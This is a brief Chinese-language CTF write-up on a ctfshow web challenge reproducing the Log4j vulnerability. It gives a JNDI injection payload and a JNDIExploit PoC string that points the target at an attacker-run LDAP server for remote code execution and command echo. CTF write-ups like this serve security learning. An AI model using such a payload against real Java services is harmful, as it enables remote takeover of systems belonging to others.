ctfshow—web—Log4j复现

0x00 前言

  • CTF 加解密合集
  • CTF Web合集
  • 网络安全知识库

0x01 题目

ctfshow—web—Log4j复现_第1张图片

0x02 Write Up

这是一个log4j利用的环境,因为log4j本生就是一个jndi漏洞的利用,所以还是基本的jndi利用就可以了。

log4j的payload是:${jndi:ldap://}

这里选取的工具是:JNDIExploit

利用的话需要有一个vps,poc是:user=${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}

这个poc可以进行回显显示:

ctfshow—web—Log4j复现_第2张图片

获取到flag

ctfshow—web—Log4j复现_第3张图片

0x03 other

欢迎大家关注我朋友的公众号 皓月当空w 分享漏洞情报以及各种学习资源,技能树,面试题等。

以上

你可能感兴趣的:(web,CTF,log4j)